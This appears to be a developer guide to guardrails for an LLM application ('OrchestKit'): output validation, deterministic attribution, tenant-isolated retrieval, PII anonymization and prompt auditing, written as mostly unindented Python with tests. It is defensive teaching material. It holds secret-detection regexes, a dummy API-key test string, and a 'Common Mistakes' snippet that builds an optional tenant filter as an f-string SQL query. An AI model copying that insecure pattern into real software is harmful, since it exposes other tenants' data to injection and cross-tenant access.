# Extract key terms from output
output_terms = set(extract_key_terms(output))
# Extract key terms from context
context_terms = set()
for text in context_texts:
context_terms.update(extract_key_terms(text))
# Calculate overlap
if not output_terms:
return ValidationResult(
status=ValidationStatus.WARNING,
reason="No key terms in output",
)
overlap = len(output_terms & context_terms) / len(output_terms)
if overlap < threshold:
return ValidationResult(
status=ValidationStatus.WARNING,
reason=f"Low grounding score: {overlap:.2%}",
details={
"overlap": overlap,
"threshold": threshold,
"ungrounded_terms": list(output_terms - context_terms)[:10],
},
)
return ValidationResult(
status=ValidationStatus.PASSED,
details={"grounding_score": overlap},
)
def extract_key_terms(text: str) -> list[str]:
"""Extract meaningful terms from text"""
import re
# Simple: words 4+ chars, lowercased
words = re.findall(r'\b[a-zA-Z]{4,}\b', text.lower())
# Filter common words
stopwords = {'this', 'that', 'with', 'from', 'have', 'been', 'will', 'would'}
    return [w for w in words if w not in stopwords]
5. Content Safety
async def validate_content_safety(
output: str,
) -> ValidationResult:
"""
Check for toxic/harmful content.
Uses simple pattern matching + optional LLM check.
"""
# Quick pattern check
toxic_patterns = [
r'\b(hate|violence|harm|kill)\b',
r'\b(password|secret|api.?key)\b',
]
for pattern in toxic_patterns:
if re.search(pattern, output, re.IGNORECASE):
return ValidationResult(
status=ValidationStatus.FAILED,
reason=f"Potentially unsafe content detected",
)
# PII detection
pii_patterns = {
"email": r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b',
"phone": r'\b\d{3}[-.]?\d{3}[-.]?\d{4}\b',
"ssn": r'\b\d{3}-\d{2}-\d{4}\b',
}
detected_pii = []
for pii_type, pattern in pii_patterns.items():
if re.search(pattern, output):
detected_pii.append(pii_type)
if detected_pii:
return ValidationResult(
status=ValidationStatus.WARNING,
reason=f"Potential PII detected: {detected_pii}",
details={"pii_types": detected_pii},
)
    return ValidationResult(status=ValidationStatus.PASSED)
6. Size Limits
def validate_size(
output: str,
max_chars: int = 50000,
max_tokens: int = 10000,
) -> ValidationResult:
"""
Ensure output is within size limits.
"""
if len(output) > max_chars:
return ValidationResult(
status=ValidationStatus.FAILED,
reason=f"Output exceeds {max_chars} chars: {len(output)}",
)
# Rough token estimate
estimated_tokens = len(output) // 4
if estimated_tokens > max_tokens:
return ValidationResult(
status=ValidationStatus.WARNING,
reason=f"Output may exceed token limit: ~{estimated_tokens}",
)
    return ValidationResult(status=ValidationStatus.PASSED)
7. Combined Validator
from dataclasses import dataclass
@dataclass
class GuardrailsConfig:
validate_schema: bool = True
validate_no_ids: bool = True
validate_grounding: bool = True
validate_safety: bool = True
validate_size: bool = True
grounding_threshold: float = 0.3
max_output_chars: int = 50000
async def run_guardrails(
llm_output: dict,
context_texts: list[str],
schema: type[BaseModel],
    config: GuardrailsConfig | None = None,
) -> tuple[BaseModel | None, list[ValidationResult]]:
    """
    Run all guardrails on LLM output.
    Returns parsed output and all validation results.
    """
    config = config or GuardrailsConfig()  # avoid a shared default instance
    results = []
parsed = None
# 1. Schema validation
if config.validate_schema:
parsed, result = validate_schema(llm_output, schema)
results.append(result)
if not result.is_valid:
return None, results # Stop early
output_str = str(llm_output)
# 2. No hallucinated IDs
if config.validate_no_ids:
result = validate_no_ids(output_str)
results.append(result)
# 3. Grounding check
if config.validate_grounding:
result = validate_grounding(
output_str,
context_texts,
config.grounding_threshold,
)
results.append(result)
# 4. Content safety
if config.validate_safety:
result = await validate_content_safety(output_str)
results.append(result)
# 5. Size limits
if config.validate_size:
result = validate_size(output_str, config.max_output_chars)
results.append(result)
# Check for failures
failures = [r for r in results if r.status == ValidationStatus.FAILED]
if failures:
return None, results
    return parsed, results
OrchestKit Integration
# backend/app/workflows/agents/content_analyzer.py
async def analyze_with_guardrails(state: AnalysisState) -> AnalysisState:
"""Run LLM with output guardrails"""
# Call LLM
llm_response = await llm.generate(state.prompt)
# Run guardrails
parsed, validations = await run_guardrails(
llm_output=llm_response,
context_texts=state.context_texts,
schema=AnalysisOutput,
)
# Log validations
for v in validations:
if v.status != ValidationStatus.PASSED:
logger.warning(
"guardrail_issue",
status=v.status.value,
reason=v.reason,
trace_id=state.request_context.trace_id,
)
if parsed is None:
raise GuardrailError(
"LLM output failed validation",
validations=[v for v in validations if not v.is_valid],
)
    return state.with_output(parsed)
Common Mistakes
# ❌ BAD: No validation
artifact.content = llm_response["content"] # Could be anything!
# ❌ BAD: Only schema validation
parsed = AnalysisOutput.parse_obj(response) # Ignores content issues
# ❌ BAD: Trusting LLM completely
if llm_response.get("is_safe", True): # LLM said it's safe!
use_response(llm_response)
# ✅ GOOD: Full guardrail pipeline
parsed, results = await run_guardrails(
llm_output=response,
context_texts=context,
schema=AnalysisOutput,
)
Testing Guardrails
class TestGuardrails:
def test_detects_hallucinated_uuid(self):
output = "Analysis for doc 123e4567-e89b-12d3-a456-426614174000"
result = validate_no_ids(output)
assert result.status == ValidationStatus.FAILED
def test_detects_low_grounding(self):
output = "This is about quantum physics and black holes"
context = ["Python programming tutorial"]
result = validate_grounding(output, context)
assert result.status == ValidationStatus.WARNING
async def test_detects_pii(self):
output = "Contact john@example.com for details"
result = await validate_content_safety(output)
assert result.status == ValidationStatus.WARNING
assert "email" in result.details["pii_types"]
async def test_full_pipeline_passes(self):
valid_output = {
"summary": "Introduction to machine learning",
"key_concepts": ["ML", "training", "models"],
"difficulty": "intermediate",
}
context = ["Machine learning is a subset of AI..."]
parsed, results = await run_guardrails(
llm_output=valid_output,
context_texts=context,
schema=AnalysisOutput,
)
assert parsed is not None
        assert all(r.is_valid for r in results)
Post-LLM Attribution
The Principle
Attribution is DETERMINISTIC, not LLM-generated.
The LLM produces content. We attach context from our records.
┌────────────────────────────────────────────────────────────┐
│ POST-LLM PHASE │
├────────────────────────────────────────────────────────────┤
│ │
│ ┌─────────────────────┐ │
│ │ LLM │ │
│ │ │ │
│ │ Output: content │ │
│ │ (text, analysis) │ │
│ └──────────┬──────────┘ │
│ │ │
│ ▼ │
│ ┌────────────────────────┐ │
│ │ ATTRIBUTION LAYER │ │
│ │ │ │
│ From Pre-LLM: From Context: │
│ ├─ source_refs ─────────────────────► source_ids │
│ └─ chunk_ids │ │
│ │ │
│ From RequestContext: │ │
│ ├─ user_id ─────────────────────────► user_id │
│ ├─ tenant_id ───────────────────────► tenant_id │
│ ├─ trace_id ────────────────────────► trace_id │
│ └─ analysis_id ─────────────────────► analysis_id │
│ │ │
│ Generated: │ │
│ ├─ new UUID ────────────────────────► artifact_id │
│ └─ timestamp ───────────────────────► created_at │
│ │ │ │
│ └────────────┬───────────┘ │
│ │ │
│ ▼ │
│ ┌────────────────────────┐ │
│ │ COMPLETE RESULT │ │
│ │ │ │
│ │ content + attribution │ │
│ │ (ready for storage) │ │
│ └────────────────────────┘ │
│ │
└────────────────────────────────────────────────────────────┘
Implementation
1. Attribution Data Structure
from dataclasses import dataclass
from datetime import datetime, timezone
from uuid import UUID, uuid4
@dataclass
class AttributedResult:
"""LLM output with deterministic attribution"""
# Generated identifier
id: UUID
# From RequestContext (system-provided)
user_id: UUID
tenant_id: UUID
analysis_id: UUID
trace_id: str
# From Pre-LLM refs (deterministic)
source_document_ids: list[UUID]
source_chunk_ids: list[UUID]
# From LLM (content only)
content: str
key_concepts: list[str]
difficulty_level: str
summary: str
# Metadata
created_at: datetime
model_used: str
    processing_time_ms: float
2. Attribution Function
async def attribute_llm_output(
llm_output: dict,
ctx: RequestContext,
source_refs: SourceReference,
model_name: str,
processing_time_ms: float,
) -> AttributedResult:
"""
Attach context to LLM output.
All attribution comes from our records, not the LLM.
"""
# Validate LLM output has no IDs
if contains_identifiers(llm_output):
raise SecurityError("LLM output contains identifiers")
return AttributedResult(
# New ID for this artifact
id=uuid4(),
# From RequestContext (verified from JWT)
user_id=ctx.user_id,
tenant_id=ctx.tenant_id,
analysis_id=ctx.resource_id,
trace_id=ctx.trace_id,
# From Pre-LLM capture (deterministic)
source_document_ids=source_refs.document_ids,
source_chunk_ids=source_refs.chunk_ids,
# From LLM (content only)
content=llm_output["analysis"],
key_concepts=llm_output.get("key_concepts", []),
difficulty_level=llm_output.get("difficulty", "intermediate"),
summary=llm_output.get("summary", ""),
# Metadata
created_at=datetime.now(timezone.utc),
model_used=model_name,
processing_time_ms=processing_time_ms,
)
import re

# Shared pattern, also used by the tests below
UUID_PATTERN = r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}'

def contains_identifiers(output: dict) -> bool:
    """Check if LLM output contains any identifiers"""
    output_str = str(output)
    # Check for UUIDs
    if re.search(UUID_PATTERN, output_str, re.IGNORECASE):
        return True
    # Check for ID field names in content
    for field in ["user_id", "tenant_id", "document_id"]:
        if field in output_str.lower():
            return True
    return False
3. Storage with Attribution
async def save_attributed_result(
result: AttributedResult,
db: AsyncSession,
) -> None:
"""
Save result with all attribution intact.
Attribution comes from our context, not LLM.
"""
# Create artifact record
artifact = Artifact(
id=result.id,
user_id=result.user_id,
tenant_id=result.tenant_id,
analysis_id=result.analysis_id,
content=result.content,
key_concepts=result.key_concepts,
difficulty_level=result.difficulty_level,
summary=result.summary,
created_at=result.created_at,
model_used=result.model_used,
)
db.add(artifact)
# Create source links
for doc_id in result.source_document_ids:
link = ArtifactSourceLink(
artifact_id=result.id,
document_id=doc_id,
tenant_id=result.tenant_id, # Denormalized for RLS
)
db.add(link)
await db.commit()
# Audit log
logger.audit(
"artifact.created",
artifact_id=result.id,
user_id=result.user_id,
tenant_id=result.tenant_id,
source_count=len(result.source_document_ids),
    )
OrchestKit Integration
Content Analysis Workflow
# backend/app/workflows/agents/content_analyzer.py
async def create_analysis_artifact(state: AnalysisState) -> AnalysisState:
"""Create artifact with proper attribution"""
# LLM output (content only)
llm_output = state.llm_response
# Attribute using our context
attributed = await attribute_llm_output(
llm_output=llm_output,
ctx=state.request_context, # From JWT
source_refs=state.source_refs, # From pre-LLM
model_name=state.model_used,
processing_time_ms=state.llm_time_ms,
)
# Save with attribution
await save_attributed_result(attributed, state.db)
    return state.with_artifact(attributed)
Artifact Retrieval
# backend/app/api/artifacts.py
@router.get("/{artifact_id}")
async def get_artifact(
artifact_id: UUID,
ctx: RequestContext = Depends(get_request_context),
db: AsyncSession = Depends(get_db),
):
"""Get artifact with source attribution"""
# Query with tenant filter
artifact = await db.execute(
"""
SELECT a.*, array_agg(asl.document_id) as sources
FROM artifacts a
LEFT JOIN artifact_source_links asl ON a.id = asl.artifact_id
WHERE a.id = :id
AND a.tenant_id = :tenant_id -- ALWAYS filter
GROUP BY a.id
""",
{
"id": artifact_id,
"tenant_id": ctx.tenant_id,
}
)
if not artifact:
raise HTTPException(404)
return ArtifactResponse(
id=artifact.id,
content=artifact.content,
sources=artifact.sources, # Deterministic from our records
created_at=artifact.created_at,
    )
Common Mistakes
# ❌ BAD: Asking LLM for attribution
prompt = "Analyze this and tell me which document it came from"
response = llm.generate(prompt)
doc_id = response["source_document"] # HALLUCINATED!
# ❌ BAD: Trusting LLM-provided IDs
llm_output = {"analysis": "...", "user_id": "abc123"}
artifact.user_id = llm_output["user_id"] # WRONG!
# ❌ BAD: Generating IDs in prompt
prompt = f"Generate a unique ID for this analysis: {analysis_id}"
# ✅ GOOD: Attribution from our records
artifact.user_id = ctx.user_id # From JWT
artifact.sources = source_refs.document_ids # From pre-LLM
# ✅ GOOD: Generate IDs ourselves
artifact.id = uuid4() # We generate
# ✅ GOOD: LLM provides content only
artifact.content = llm_output["analysis"]  # Just the text
Testing Attribution
class TestAttribution:
async def test_attribution_from_context_not_llm(self, ctx):
"""Attribution must come from our context"""
# LLM returns content only
llm_output = {
"analysis": "This is the analysis",
"key_concepts": ["ML", "AI"],
}
source_refs = SourceReference(
document_ids=[uuid4(), uuid4()],
chunk_ids=[uuid4()],
)
        result = await attribute_llm_output(
            llm_output=llm_output,
            ctx=ctx,
            source_refs=source_refs,
            model_name="test-model",  # required by the signature above
            processing_time_ms=1.0,
        )
# Attribution from context, not LLM
assert result.user_id == ctx.user_id
assert result.tenant_id == ctx.tenant_id
assert result.source_document_ids == source_refs.document_ids
    async def test_rejects_llm_with_ids(self, ctx, source_refs):
        """Reject LLM output that contains IDs"""
        bad_output = {
            "analysis": "Result for user 123e4567-e89b-12d3-a456-426614174000",
        }
        with pytest.raises(SecurityError):
            await attribute_llm_output(
                llm_output=bad_output,
                ctx=ctx,
                source_refs=source_refs,
                model_name="test-model",
                processing_time_ms=1.0,
            )
async def test_source_links_created(self, ctx, db):
"""Source links are created with artifact"""
result = await attribute_llm_output(...)
await save_attributed_result(result, db)
links = await db.execute(
"SELECT * FROM artifact_source_links WHERE artifact_id = :id",
{"id": result.id}
)
        assert len(links) == len(result.source_document_ids)
Pre-LLM Filtering
Pre-LLM Filtering
Purpose
Before ANY data reaches the LLM, it must be:
- Scoped to the current tenant/user
- Filtered for relevance
- Stripped of identifiers
- Captured for later attribution
┌────────────────────────────────────────────────────────────┐
│ PRE-LLM PHASE │
├────────────────────────────────────────────────────────────┤
│ │
│ User Query ──► Tenant Filter ──► Content Extract ──► LLM │
│ │ │ │ │
│ │ │ │ │
│ ▼ ▼ ▼ │
│ ┌─────────┐ ┌───────────┐ ┌─────────────┐ │
│ │ Query │ │ Documents │ │ Text Only │ │
│ │ Text │ │ for THIS │ │ (no IDs) │ │
│ │ │ │ tenant │ │ │ │
│ └─────────┘ └───────────┘ └─────────────┘ │
│ │ │
│ ▼ │
│ ┌─────────────┐ │
│ │ Save Refs │ │
│ │ for Later │ ◄── For post-LLM attribution│
│ │ Attribution │ │
│ └─────────────┘ │
│ │
└────────────────────────────────────────────────────────────┘
Implementation
1. Tenant-Scoped Retrieval
from uuid import UUID
from dataclasses import dataclass
@dataclass
class SourceReference:
"""Tracks what was retrieved for attribution"""
document_ids: list[UUID]
chunk_ids: list[UUID]
similarity_scores: list[float]
retrieval_timestamp: datetime
async def retrieve_with_isolation(
query: str,
ctx: RequestContext,
limit: int = 10,
) -> tuple[list[str], SourceReference]:
"""
Retrieve documents scoped to tenant/user.
Returns: (content_texts, source_references)
"""
# Embed query
query_embedding = await embed(query)
# Search with MANDATORY tenant filter
results = await db.execute(
"""
SELECT id, chunk_id, content,
1 - (embedding <-> :query) as similarity
FROM document_chunks
WHERE tenant_id = :tenant_id -- REQUIRED
AND user_id = :user_id -- REQUIRED
AND embedding <-> :query < 0.5
ORDER BY embedding <-> :query
LIMIT :limit
""",
{
"tenant_id": ctx.tenant_id, # From JWT
"user_id": ctx.user_id, # From JWT
"query": query_embedding,
"limit": limit,
}
)
# Separate content from references
content_texts = [r.content for r in results]
source_refs = SourceReference(
document_ids=[r.id for r in results],
chunk_ids=[r.chunk_id for r in results],
similarity_scores=[r.similarity for r in results],
retrieval_timestamp=datetime.now(timezone.utc),
)
    return content_texts, source_refs
2. Content Extraction (Strip IDs)
def extract_content_only(documents: list[Document]) -> list[str]:
"""
Extract text content, stripping any embedded IDs.
"""
contents = []
for doc in documents:
# Get content
text = doc.content
# Remove any embedded IDs (defensive)
text = strip_identifiers(text)
contents.append(text)
return contents
def strip_identifiers(text: str) -> str:
"""Remove any identifiers that might have leaked into content"""
import re
# Remove UUIDs
text = re.sub(
r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}',
'[REDACTED]',
text,
flags=re.IGNORECASE
)
# Remove common ID patterns
patterns = [
r'user_id:\s*\S+',
r'tenant_id:\s*\S+',
r'doc_id:\s*\S+',
]
for pattern in patterns:
text = re.sub(pattern, '[REDACTED]', text, flags=re.IGNORECASE)
    return text
3. Full Pre-LLM Pipeline
@dataclass
class PreLLMResult:
"""Complete pre-LLM preparation result"""
query: str
context_texts: list[str]
source_refs: SourceReference
preparation_time_ms: float
async def prepare_for_llm(
query: str,
ctx: RequestContext,
) -> PreLLMResult:
"""
Complete pre-LLM preparation:
1. Retrieve with tenant isolation
2. Extract content only
3. Save references for attribution
"""
start = time.monotonic()
# Step 1: Tenant-scoped retrieval
raw_results, source_refs = await retrieve_with_isolation(
query=query,
ctx=ctx,
)
# Step 2: Extract and clean content
context_texts = [strip_identifiers(text) for text in raw_results]
# Step 3: Audit for any remaining IDs
for text in context_texts:
violations = audit_prompt(text)
if violations:
logger.warning(
"ID found in content, redacting",
violations=violations,
)
elapsed = (time.monotonic() - start) * 1000
return PreLLMResult(
query=query,
context_texts=context_texts,
source_refs=source_refs,
preparation_time_ms=elapsed,
    )
OrchestKit Integration
In Content Analysis Workflow
# backend/app/workflows/agents/retriever.py
async def retrieve_context(state: AnalysisState) -> AnalysisState:
"""RAG retrieval with tenant isolation"""
ctx = state.request_context
# Pre-LLM preparation
pre_llm = await prepare_for_llm(
query=state.analysis_request.query,
ctx=ctx,
)
# Store for later phases
return state.copy(
context_texts=pre_llm.context_texts,
source_refs=pre_llm.source_refs,
# NO IDs in state that goes to LLM
    )
In Library Search
# backend/app/services/search.py
async def search_libraries(
query: str,
ctx: RequestContext,
) -> SearchResult:
"""Search golden dataset with isolation"""
# Always filter by tenant
results = await db.execute(
"""
SELECT id, title, url, summary, content
FROM golden_dataset
WHERE tenant_id = :tenant_id
AND search_vector @@ plainto_tsquery(:query)
ORDER BY ts_rank(search_vector, plainto_tsquery(:query)) DESC
LIMIT 20
""",
{
"tenant_id": ctx.tenant_id,
"query": query,
}
)
# Return content and refs separately
return SearchResult(
items=[r.content for r in results], # Content for LLM
refs=[r.id for r in results], # IDs for attribution
    )
Common Mistakes
# ❌ BAD: Query without tenant filter
results = await db.execute("SELECT * FROM documents")
# ❌ BAD: Tenant filter as optional
async def search(tenant_id: UUID | None = None):
query = "SELECT * FROM documents"
if tenant_id: # Can be bypassed!
query += f" WHERE tenant_id = '{tenant_id}'"
# ❌ BAD: Trusting client-provided tenant
async def search(request: Request):
tenant_id = request.query_params["tenant_id"] # Attacker controls!
# ❌ BAD: Including IDs in content
results = [{"id": doc.id, "content": doc.content} for doc in docs]
# ✅ GOOD: Mandatory tenant filter from context
results = await db.execute(
"SELECT content FROM documents WHERE tenant_id = :tid",
{"tid": ctx.tenant_id} # From verified JWT
)
# ✅ GOOD: Content separate from refs
content = [doc.content for doc in docs] # For LLM
refs = [doc.id for doc in docs]  # For attribution
Testing Pre-LLM Filtering
class TestPreLLMFiltering:
async def test_retrieval_respects_tenant(
self,
tenant_a_ctx,
tenant_b_ctx,
):
# Create doc for tenant B
await create_document(
tenant_id=tenant_b_ctx.tenant_id,
content="Secret data",
)
# Search as tenant A
result = await prepare_for_llm(
query="secret",
ctx=tenant_a_ctx,
)
# Must not find tenant B's data
assert len(result.context_texts) == 0
async def test_content_has_no_uuids(self, ctx):
result = await prepare_for_llm(
query="test query",
ctx=ctx,
)
for text in result.context_texts:
assert not re.search(UUID_PATTERN, text)
async def test_source_refs_captured(self, ctx):
result = await prepare_for_llm(
query="test query",
ctx=ctx,
)
# Refs saved for attribution
assert len(result.source_refs.document_ids) > 0
        assert result.source_refs.retrieval_timestamp is not None
Presidio Integration
Microsoft Presidio Integration
Enterprise-grade PII detection and anonymization with Microsoft Presidio.
Installation
pip install presidio-analyzer presidio-anonymizer
python -m spacy download en_core_web_lg
Basic Usage
from presidio_analyzer import AnalyzerEngine
from presidio_anonymizer import AnonymizerEngine
# Initialize engines (singleton recommended)
analyzer = AnalyzerEngine()
anonymizer = AnonymizerEngine()
def detect_pii(text: str, language: str = "en") -> list:
"""Detect PII entities in text."""
return analyzer.analyze(
text=text,
language=language,
entities=["PERSON", "EMAIL_ADDRESS", "PHONE_NUMBER", "CREDIT_CARD", "US_SSN"]
)
def anonymize_text(text: str, language: str = "en") -> str:
"""Detect and anonymize PII in text."""
results = analyzer.analyze(text=text, language=language)
    return anonymizer.anonymize(text=text, analyzer_results=results).text
Custom Operators
from presidio_anonymizer.entities import OperatorConfig
operators = {
"PERSON": OperatorConfig("replace", {"new_value": "[PERSON]"}),
"CREDIT_CARD": OperatorConfig("mask", {"masking_char": "*", "chars_to_mask": 12}),
"EMAIL_ADDRESS": OperatorConfig("hash", {"hash_type": "sha256"}),
"US_SSN": OperatorConfig("redact"),
}
anonymized = anonymizer.anonymize(text=text, analyzer_results=results, operators=operators)
Custom Recognizers
from presidio_analyzer import Pattern, PatternRecognizer
internal_id_recognizer = PatternRecognizer(
supported_entity="INTERNAL_ID",
patterns=[Pattern(name="internal_id", regex=r"ID-[A-Z]{2}-\d{6}", score=0.9)]
)
analyzer.registry.add_recognizer(internal_id_recognizer)
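Before registering a custom recognizer, it can help to sanity-check the regex on its own; a minimal sketch using the same pattern as the INTERNAL_ID recognizer above:

```python
import re

# Same pattern as the INTERNAL_ID recognizer above
internal_id = re.compile(r"ID-[A-Z]{2}-\d{6}")

match = internal_id.search("Escalate ticket ID-US-123456 to tier 2")
# Lowercase variants do not match; add re.IGNORECASE if they should
miss = internal_id.search("ticket id-us-123456")
```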
Prompt Audit
Prompt Audit
Purpose
Before any prompt is sent to an LLM, audit it for forbidden content:
┌────────────────────────────────────────────────────────────┐
│ PROMPT AUDIT │
├────────────────────────────────────────────────────────────┤
│ │
│ Prompt Template + Variables ──► Audit ──► Send to LLM │
│ │ │
│ ▼ │
│ ┌──────────────┐ │
│ │ FORBIDDEN │ │
│ │ PATTERNS │ │
│ ├──────────────┤ │
│ │ • user_id │ │
│ │ • tenant_id │ │
│ │ • UUIDs │ │
│ │ • API keys │ │
│ │ • Tokens │ │
│ │ • Secrets │ │
│ └──────────────┘ │
│ │ │
│ ┌───────────────┼───────────────┐ │
│ ▼ ▼ ▼ │
│ ┌──────────┐ ┌──────────┐ ┌──────────┐ │
│ │ CLEAN │ │ WARNING │ │ BLOCK │ │
│ │ │ │ │ │ │ │
│ │ Proceed │ │ Log + │ │ Reject │ │
│ │ │ │ Proceed │ │ │ │
│ └──────────┘ └──────────┘ └──────────┘ │
│ │
└────────────────────────────────────────────────────────────┘
OrchestKit Forbidden Patterns
Critical (Block Immediately)
| Pattern | Regex | Why Block |
|---|---|---|
| UUID | [0-9a-f]\{8\}-[0-9a-f]\{4\}-... | Hallucination, cross-tenant |
| API Key | api[_-]?key | Secret exposure |
| Token | token\s*[:=] | Auth exposure |
| Password | password\s*[:=] | Credential exposure |
| Secret | secret\s*[:=] | Generic secret |
Warning (Log and Review)
| Pattern | Regex | Why Warn |
|---|---|---|
| user_id | user[_-]?id | Likely context leak |
| tenant_id | tenant[_-]?id | Likely isolation leak |
| analysis_id | analysis[_-]?id | Likely tracking leak |
| document_id | document[_-]?id | Likely reference leak |
| session_id | session[_-]?id | Likely auth leak |
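As a quick illustration of the two tiers, the table patterns can be exercised directly with plain re (regexes abbreviated here; the full set appears in the implementation below):

```python
import re

# Abbreviated patterns from the tables above
UUID_RE = r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"
USER_ID_RE = r"\buser[_-]?id\b"

prompt = "Analyze for user_id 123e4567-e89b-12d3-a456-426614174000"

# Critical tier: a UUID in the prompt would block the request
critical = bool(re.search(UUID_RE, prompt, re.IGNORECASE))
# Warning tier: an ID field name would be logged, then allowed through
warning = bool(re.search(USER_ID_RE, prompt, re.IGNORECASE))
```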
Implementation
1. Pattern Definitions
import re
from enum import Enum
from dataclasses import dataclass
class AuditSeverity(Enum):
CLEAN = "clean"
WARNING = "warning"
CRITICAL = "critical"
@dataclass
class AuditViolation:
pattern: str
severity: AuditSeverity
match: str
position: int
# OrchestKit-specific patterns
CRITICAL_PATTERNS = [
# UUIDs
(r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}', "UUID"),
# Secrets
(r'api[_-]?key\s*[:=]\s*["\']?\S+', "API_KEY"),
(r'password\s*[:=]\s*["\']?\S+', "PASSWORD"),
(r'secret\s*[:=]\s*["\']?\S+', "SECRET"),
(r'token\s*[:=]\s*["\']?\S+', "TOKEN"),
(r'bearer\s+\S+', "BEARER_TOKEN"),
]
WARNING_PATTERNS = [
# OrchestKit identifiers
(r'\buser[_-]?id\b', "USER_ID_FIELD"),
(r'\btenant[_-]?id\b', "TENANT_ID_FIELD"),
(r'\banalysis[_-]?id\b', "ANALYSIS_ID_FIELD"),
(r'\bdocument[_-]?id\b', "DOCUMENT_ID_FIELD"),
(r'\bartifact[_-]?id\b', "ARTIFACT_ID_FIELD"),
(r'\bchunk[_-]?id\b', "CHUNK_ID_FIELD"),
(r'\bsession[_-]?id\b', "SESSION_ID_FIELD"),
(r'\btrace[_-]?id\b', "TRACE_ID_FIELD"),
(r'\bworkflow[_-]?run[_-]?id\b', "WORKFLOW_ID_FIELD"),
]
2. Audit Function
def audit_prompt(prompt: str) -> list[AuditViolation]:
"""
Audit prompt for forbidden patterns.
Returns list of violations.
"""
violations = []
# Check critical patterns
for pattern, name in CRITICAL_PATTERNS:
for match in re.finditer(pattern, prompt, re.IGNORECASE):
violations.append(AuditViolation(
pattern=name,
severity=AuditSeverity.CRITICAL,
match=match.group()[:50], # Truncate for logging
position=match.start(),
))
# Check warning patterns
for pattern, name in WARNING_PATTERNS:
for match in re.finditer(pattern, prompt, re.IGNORECASE):
violations.append(AuditViolation(
pattern=name,
severity=AuditSeverity.WARNING,
match=match.group(),
position=match.start(),
))
return violations
def has_critical_violations(violations: list[AuditViolation]) -> bool:
"""Check if any violations are critical"""
    return any(v.severity == AuditSeverity.CRITICAL for v in violations)
3. Audit Decorator
from functools import wraps
import structlog
logger = structlog.get_logger()
def audit_before_llm(func):
"""
Decorator that audits prompts before LLM call.
Blocks on critical violations, logs warnings.
"""
@wraps(func)
async def wrapper(*args, **kwargs):
# Extract prompt from args/kwargs
prompt = kwargs.get("prompt") or args[0]
# Audit
violations = audit_prompt(prompt)
# Log warnings
for v in violations:
if v.severity == AuditSeverity.WARNING:
logger.warning(
"prompt_audit_warning",
pattern=v.pattern,
position=v.position,
)
# Block on critical
if has_critical_violations(violations):
critical = [v for v in violations
if v.severity == AuditSeverity.CRITICAL]
raise PromptSecurityError(
f"Prompt contains forbidden content: {[v.pattern for v in critical]}"
)
# Proceed
return await func(*args, **kwargs)
return wrapper
# Usage
@audit_before_llm
async def call_llm(prompt: str) -> str:
    return await llm.generate(prompt)
4. Safe Prompt Builder
from typing import Any

class SafePromptBuilder:
"""
Builds prompts with built-in audit.
Prevents accidental ID inclusion.
"""
def __init__(self):
self._parts: list[str] = []
self._context_ids: dict[str, Any] = {} # Stored but never in prompt
def add_instruction(self, text: str) -> "SafePromptBuilder":
"""Add instruction text (audited)"""
violations = audit_prompt(text)
if has_critical_violations(violations):
raise PromptSecurityError("Instruction contains forbidden content")
self._parts.append(text)
return self
def add_content(self, content: str) -> "SafePromptBuilder":
"""Add user content (sanitized)"""
# Strip any IDs from content
clean_content = self._sanitize(content)
self._parts.append(clean_content)
return self
def add_context_texts(self, texts: list[str]) -> "SafePromptBuilder":
"""Add context texts (sanitized)"""
for text in texts:
clean = self._sanitize(text)
self._parts.append(f"- {clean}")
return self
def store_context_id(self, key: str, value: Any) -> "SafePromptBuilder":
"""Store ID for post-LLM attribution (never in prompt)"""
self._context_ids[key] = value
return self
def _sanitize(self, text: str) -> str:
"""Remove any IDs from text"""
# Remove UUIDs
text = re.sub(
r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}',
'[ID]',
text,
flags=re.IGNORECASE
)
return text
def build(self) -> tuple[str, dict]:
"""
Build prompt and return with stored context.
Returns: (prompt, context_ids)
"""
prompt = "\n\n".join(self._parts)
# Final audit
violations = audit_prompt(prompt)
if violations:
logger.warning(
"prompt_audit_final",
violation_count=len(violations),
)
if has_critical_violations(violations):
raise PromptSecurityError("Built prompt contains forbidden content")
return prompt, self._context_ids
# Usage
builder = SafePromptBuilder()
prompt, context = (
builder
.add_instruction("Analyze the following content:")
.add_content(user_query)
.add_context_texts(retrieved_docs)
.store_context_id("user_id", ctx.user_id) # Stored, not in prompt
.store_context_id("sources", source_refs) # Stored, not in prompt
.build()
)
OrchestKit Integration
Workflow Integration
# backend/app/workflows/agents/prompts/content_analysis.py
from llm_safety import SafePromptBuilder
def build_analysis_prompt(
query: str,
context_texts: list[str],
ctx: RequestContext,
) -> tuple[str, dict]:
"""
Build content analysis prompt safely.
Context IDs stored separately for attribution.
"""
return (
SafePromptBuilder()
.add_instruction("""
You are an expert content analyzer. Analyze the following
content and provide insights about:
1. Key concepts
2. Difficulty level
3. Prerequisites
4. Summary
""")
.add_instruction(f"User query: {query}")
.add_instruction("Relevant context:")
.add_context_texts(context_texts)
.store_context_id("user_id", ctx.user_id)
.store_context_id("tenant_id", ctx.tenant_id)
.store_context_id("trace_id", ctx.trace_id)
.build()
    )
CI/CD Integration
#!/bin/bash
# scripts/audit_prompts.sh
echo "Auditing prompt templates..."
# Check for IDs in prompt files
grep -rn \
"user_id\|tenant_id\|analysis_id\|document_id\|[0-9a-f]\{8\}-[0-9a-f]\{4\}" \
backend/app/**/prompts/ \
--include="*.py" \
--include="*.txt" \
--include="*.jinja2"
if [ $? -eq 0 ]; then
echo "❌ Found potential ID leaks in prompts!"
exit 1
fi
echo "✅ Prompt audit passed"
Testing
class TestPromptAudit:
def test_detects_uuid(self):
prompt = "Analyze doc 123e4567-e89b-12d3-a456-426614174000"
violations = audit_prompt(prompt)
assert len(violations) == 1
assert violations[0].severity == AuditSeverity.CRITICAL
assert violations[0].pattern == "UUID"
def test_detects_api_key(self):
prompt = "Use api_key: sk-1234567890abcdef"
violations = audit_prompt(prompt)
assert any(v.pattern == "API_KEY" for v in violations)
def test_warns_on_user_id_field(self):
prompt = "For user_id please provide analysis"
violations = audit_prompt(prompt)
